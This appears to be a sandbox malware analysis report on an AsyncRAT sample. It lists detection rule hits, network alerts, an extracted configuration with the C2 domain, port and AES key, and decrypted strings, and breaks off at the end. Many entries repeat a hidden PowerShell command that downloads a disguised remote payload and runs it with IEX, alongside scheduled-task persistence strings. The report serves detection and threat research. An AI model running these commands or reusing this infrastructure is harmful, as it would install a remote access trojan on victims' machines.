20.2.powershell.exe.16966491660.2.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x98fc:$str01: get_ActivatePong 0xa87c:$str02: get_SslClient 0xa898:$str03: get_TcpClient 0x8e35:$str04: get_SendSync 0x8efa:$str05: get_IsConnected 0x9632:$str06: set_UseShellExecute 0xd4ba:$str07: Pastebin 0xeb52:$str08: Select * from AntivirusProduct 0x10038:$str09: Stub.exe 0x100c8:$str09: Stub.exe 0xd2a4:$str10: timeout 3 > NUL 0xd194:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0xd224:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
20.2.powershell.exe.16966443638.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
20.2.powershell.exe.16966443638.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xd194:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x5b1bc:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x10038:$a2: Stub.exe 0x100c8:$a2: Stub.exe 0x5e060:$a2: Stub.exe 0x5e0f0:$a2: Stub.exe 0x98fc:$a3: get_ActivatePong 0x57924:$a3: get_ActivatePong 0xd3ac:$a4: vmware 0x5b3d4:$a4: vmware 0xd224:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x5b24c:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xa87c:$a6: get_SslClient 0x588a4:$a6: get_SslClient
20.2.powershell.exe.16966443638.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x98fc:$str01: get_ActivatePong 0x57924:$str01: get_ActivatePong 0xa87c:$str02: get_SslClient 0x588a4:$str02: get_SslClient 0xa898:$str03: get_TcpClient 0x588c0:$str03: get_TcpClient 0x8e35:$str04: get_SendSync 0x56e5d:$str04: get_SendSync 0x8efa:$str05: get_IsConnected 0x56f22:$str05: get_IsConnected 0x9632:$str06: set_UseShellExecute 0x5765a:$str06: set_UseShellExecute 0xd4ba:$str07: Pastebin 0x5b4e2:$str07: Pastebin 0xeb52:$str08: Select * from AntivirusProduct 0x5cb7a:$str08: Select * from AntivirusProduct 0x10038:$str09: Stub.exe 0x100c8:$str09: Stub.exe 0x5e060:$str09: Stub.exe 0x5e0f0:$str09: Stub.exe 0xd2a4:$str10: timeout 3 > NUL
Click to see the 29 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7584.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi64_7584.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc09e:$b2: ::FromBase64String( 0xb9d7:$s1: -join 0x4e353:$s1: -join 0x5183:$s4: += 0x5245:$s4: += 0x946c:$s4: += 0xb589:$s4: += 0xb873:$s4: += 0xb9b9:$s4: += 0x50386:$s4: += 0x503de:$s4: += 0x50402:$s4: += 0x50466:$s4: += 0x543d1:$s4: += 0x54451:$s4: += 0x54517:$s4: += 0x54597:$s4: += 0x5476d:$s4: += 0x547f1:$s4: += 0x4ec1a:$e4: Get-WmiObject 0x4ee09:$e4: Get-Process

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7584, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , ProcessId: 908, ProcessName: wscript.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\Public\HTRFAAYAKOCE.bat

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7584, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , ProcessId: 908, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\Public\HTRFAAYAKOCE.bat

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\UZKDPUUZKDPsUZKDPeUZKDPrUZKDPs\PUZKDPuUZKDPbUZKDPlUZKDPiUZKDPc\JGEBGEOPVP.ps1'.replace('UZKDP','')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4428, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 7440, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 7584, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\Public\HTRFAAYAKOCE.bat

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\27#U0646.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 7568, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7584, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs" , ProcessId: 908, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: (D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 7584, ProcessName: powershell.exe

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7584, TargetFilename: C:\Users\Public\JGEBGEOPVP.ps1

Data Obfuscation

Sigma detected: Powershell Download and Execute IEX

Source: Process started

Author: Joe Security: Data: Command: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\27#U0646.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://alasfar-atc.com/x1ffqzjq.fup/f5cjxaxo.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname", ProcessId: 7568, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:06:04.825501+0100	2035595	1	Domain Observed Used for C2 Detected	128.90.59.133	6161	192.168.2.4	49741	TCP

ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:06:04.825501+0100	2035607	1	Domain Observed Used for C2 Detected	128.90.59.133	6161	192.168.2.4	49741	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:06:04.825501+0100	2842478	1	Malware Command and Control Activity Detected	128.90.59.133	6161	192.168.2.4	49741	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:05:59.679523+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49739	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Photo

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:06:01.409398+0100	1810009	1	Potentially Bad Traffic	192.168.2.4	49740	149.154.167.220	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:05:58.182367+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49738	34.117.59.81	443	TCP

Joe Security MALWARE njRAT - Telegram Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T13:06:00.040050+0100	1800011	1	Malware Command and Control Activity Detected	192.168.2.4	49739	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "ohsexoh.freeddns.org", "Ports": "6161", "Version": "| CRACKED BY https://t.me/xworm_v2", "Autorun": "false", "Install_Folder": "WGNQbWtNYnBnU2ZidG16VHR3bXdrRHJ1WVUzZkhWbmc=", "Install_File": "qhDc8YgGONyCJdizIO9fQ/2OXyfmZhrEybcc+piWZNVPvqaDHoF9UzwPfAIwsgjNaQM7cGT9yAOTyScLZbtKAbs/867hmPo9Gs2F3FzcZK4=", "AES_key": "XcPmkMbpgSfbtmzTtwmwkDruYU3fHVng", "Mutex": "UbsISxSwsXxRgb91RviZzMhHqDltHmav3T9EWPkVEATgKyAZldGVksIP2PdPGEUQOq6fj/0Cv5gCtOkgj29fEDil7MO8dnYo/TmAfzWkVpK/m2g4nNzw0KS35sqY6t6vmfeUBBA4d9d0azZl8Uu/jVy2gkA4SqBX0crvsYR+47ispp37PcVxwEotMgUQCceZTcGZTqDDOiDLt7RoLsVXlKuA1CPlY9/+HwSU/rnqPsV4tZYpraBn/aW4/NwsZekj0r1lkN3f+fCOtiWLZNSCS08CgXiih4/kjVDXSDN6Uf0KOgtnWCZneDs+4B+e9aNC9TGNWQqqpTvg22Nb6rmvDY5S2ttqqE5cM56GQF+MQxUXYFlSxvsOeWPJAlHUqYdcMSnB0Lel0vLB3jgpEStfbVNWSmE1sMe7I0lILti2fChot4p/YpyTVlbr+99nUKl7st2gtZdua6rMZtO6CLFD1D7CIDGlj2hcgEB2BOphPwearpR21TezZFO7Z8XI/TC2gZFyVPTCn6tcGiwtJH0h7nx9jfff1I83kau+j+uYsAIkJZZatNux1FDsaT/BqdSXFa5IQ7S+PZuWxpO5Mw3yrSC6c8SXywKuWeXpA/BesNYaCqcMSW/rD0NtiJzteRInugp/+I3oFW7diCT2dxyVPLlEYBby+lx5UCwKxgJ8S2Y=", "Certificate": "false", "ServerSignature": "true", "BDOS": "false", "Startup_Delay": "3", "Group": "null"}

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Sample uses string decryption to hide its real strings

Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 6161
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ohsexoh.freeddns.org
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: \| CRACKED BY https://t.me/xworm_v2
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: false
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: AsyncMutex_6SI8OkPnk
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: MIIE8jCCAtqgAwIBAgIQAOQb7nA/hP/L1XXxqdDJNzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNTI1MDUyMTIyWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIykAVxs0s6rZ/dwP6ujJtpnj6RSsCsZN6Cfj1InZxSIswX+zNiKJys8xyLlyexoya3ebLp5gOSzNvGMlxluLm9vCaayOzt8HuaCCUFntv/AIiigkbE2gqVYjh7qdObXhyhAgjuygHDP0QCc+VzP1aVH4CesUy1gGvxgOgmdXok2AjCssH69OYGA/DAdEzaOK7TtFqS2qqCzCldLuNBa2xy0/Yb73Zko42hlx+hvp/ciTNyFDXqIBdUIu/6X3on+ecdW8SiLMjzr8Xf1BHcoVgTbDto7EpNq2a1b2CjI23YMlc+mRq33k6R2Dw0NNZmNdnTjnFFVmZZ419g2qIxR+JetlOui7Lc77pKX5Om0+HBZqQYKTCxMVykxz0G7EuAxIXG01Wlogv1Ulj31UH2APYQpgRyZ2DUhqJ1Ls3MLxd3X4UJ00DLnhOQf4bSxqZityJ+17tFLj/qSw8niWYm9lzor2652DmCyw2tFMOnkrnBStNaymtyE5JiN3hZ+3xLlCShjHbR6ANpnmPJJWyUnVLHzYj9Fg5cVrfcIHfGDxkh6P/x32CuG1uzxFS0NsZIG6dsiNmBJLZ/B+JQp2V5a1ux3bwzlgEd3OYdDAf8KzXjFmnhfLqhBN/e33eAYdLtZ5ijj9VTACHiEA73NNTROv+9MrHe+jlDqDX+JFS2HTRktAgMBAAGjMjAwMB0GA1UdDgQWBBSGuCNUrBGiR5cyCuX6uVeVEgA8yDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBBMeYWK/JJKSBUsQ4Ba2RHStyT+uunyfCP9ht58sDUygZWxFQxl4Tmw1JLTRjU2FNia9d73P3k7BuDux/zSWJy0rc+Yr5H174M86L7rXyM/dhyZ26Ansn3rxNG7OJP+UQh559z7wwa5sVstFlVyAZOYFBUGGGMhCK/odXhRgJxnWwPR5LKzbQKGXNsvYfnyjWsh65631ZSMvoH3eblBluOwhvCHP7MotRPD8xkmMfIL9npMprJRPHco5MnenLv9c1R6x7AS93fEh359l3fOdL1LTU5K7Q0FydPztV19HDkJyotROS1hOiWze1LNQLXQ6701jb20bIcxeeWyfzJSew1p6j/iIvbBBEKoeQVx6gCXN2UHfZRzeoQKzWQPJ9EDaobDIZ6VyBJ3Vg2zCuFtLL73oJzycow0Rudn/2O9FHy6rucrLcyWxi4AiH+a0b2l1GwvZ/46TUdGFvygMflzdSxf/sVeCrYOTxXJBAnCyz1Yx5hcFI/lblBL70necTt0FDnwHQSWyrdouWYWlGupZ9HUKg6IpGEg9tx0mwyvIycHXTeeQ+NVHYR+WmbVcgYy5HIMPPOyAV7FVCjvRfQ9GofgzRasjDKSqMeWChkMC2zMjI6j6WzWDK5ZD6mCcTiP5P0f3tOkYV/+cw2elMNBmmDAnZVPwweENRxZ/YelFug7Q==
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: UbsISxSwsXxRgb91RviZzMhHqDltHmav3T9EWPkVEATgKyAZldGVksIP2PdPGEUQOq6fj/0Cv5gCtOkgj29fEDil7MO8dnYo/TmAfzWkVpK/m2g4nNzw0KS35sqY6t6vmfeUBBA4d9d0azZl8Uu/jVy2gkA4SqBX0crvsYR+47ispp37PcVxwEotMgUQCceZTcGZTqDDOiDLt7RoLsVXlKuA1CPlY9/+HwSU/rnqPsV4tZYpraBn/aW4/NwsZekj0r1lkN3f+fCOtiWLZNSCS08CgXiih4/kjVDXSDN6Uf0KOgtnWCZneDs+4B+e9aNC9TGNWQqqpTvg22Nb6rmvDY5S2ttqqE5cM56GQF+MQxUXYFlSxvsOeWPJAlHUqYdcMSnB0Lel0vLB3jgpEStfbVNWSmE1sMe7I0lILti2fChot4p/YpyTVlbr+99nUKl7st2gtZdua6rMZtO6CLFD1D7CIDGlj2hcgEB2BOphPwearpR21TezZFO7Z8XI/TC2gZFyVPTCn6tcGiwtJH0h7nx9jfff1I83kau+j+uYsAIkJZZatNux1FDsaT/BqdSXFa5IQ7S+PZuWxpO5Mw3yrSC6c8SXywKuWeXpA/BesNYaCqcMSW/rD0NtiJzteRInugp/+I3oFW7diCT2dxyVPLlEYBby+lx5UCwKxgJ8S2Y=
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: true
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: null
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp	String decryptor: DOOOOOOONE2025
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: 6161
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: ohsexoh.freeddns.org
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: \| CRACKED BY https://t.me/xworm_v2
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: false
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: AsyncMutex_6SI8OkPnk
Source: 20.2.powershell.exe.16966443638.1.raw.unpack	String decryptor: 